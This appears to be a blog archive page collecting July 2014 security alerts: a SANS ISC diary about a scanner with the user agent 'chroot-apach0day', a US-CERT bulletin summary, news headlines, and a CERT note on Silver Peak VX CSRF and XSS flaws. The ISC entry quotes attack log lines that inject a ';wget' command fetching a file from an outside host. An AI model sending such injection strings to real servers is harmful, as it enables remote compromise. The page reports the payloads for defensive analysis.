Archive for the ‘Research & Alerts’ Category

Interesting HTTP User Agent "chroot-apach0day", (Mon, Jul 28th)

Our reader Robin submitted the following detect:

    I've got a site that was scanned this morning by a tool that left these entries in the logs:

    [HTTP_USER_AGENT] => chroot-apach0day
    [HTTP_REFERRER] => /xA/x0a/x05
    [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day

The URL that appears to be retrieved does not exist, even though the domain does. In our own web logs, we have seen a couple of similar requests:

    162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
    162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
    162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day". There are a couple of other security-related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.

Probably not a good idea to read this if you are a #CISO

SB14-209: Vulnerability Summary for the Week of July 21, 2014

Original release date: July 28, 2014

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT).

Don't believe the hype: here are 4 common #infosec oversights

KPMG says this chaos is making it easier, a LOT easier, for our enemies to #hack into our systems. Sad but true.

Wikipedia ban edits from US Congress IPs after anti-Cuban 'tweaks' (you need to get up early to change history)

Indian #hacker arrested in Chennai (Tamil Nadu) for breaking into Microsoft Website, stealing Product Keys

VU#867980: Silver Peak VX is vulnerable to cross-site request forgery and cross-site scripting

Vulnerability Note VU#867980
Silver Peak VX is vulnerable to cross-site request forgery and cross-site scripting
Original Release date: 28 Jul 2014 | Last revised: 28 Jul 2014

Overview

Silver Peak VX version 6.2.2.0_47968 is vulnerable to cross-site request forgery and cross-site scripting.

Description

CWE-352: Cross-Site Request Forgery (CSRF) – CVE-2014-2974
Silver Peak VX version 6.2.2.0_47968 contains a cross-site request forgery vulnerability in /php/user_account.php that allows an unauthenticated user to create a new administrator account.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') – CVE-2014-2975
Silver Peak VX version 6.2.2.0_47968 also contains a reflected cross-site scripting vulnerability in /php/user_account.php that can allow an attacker to inject arbitrary HTML content (including scripts) via the vulnerable query string parameter user_id.

Almost 1 in 10 Android apps are now malware (and Asia has highest infection rate, then France and Russia)

ISC StormCast for Monday, July 28th 2014 http://isc.sans.edu/podcastdetail.html?id=4079, (Mon, Jul 28th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.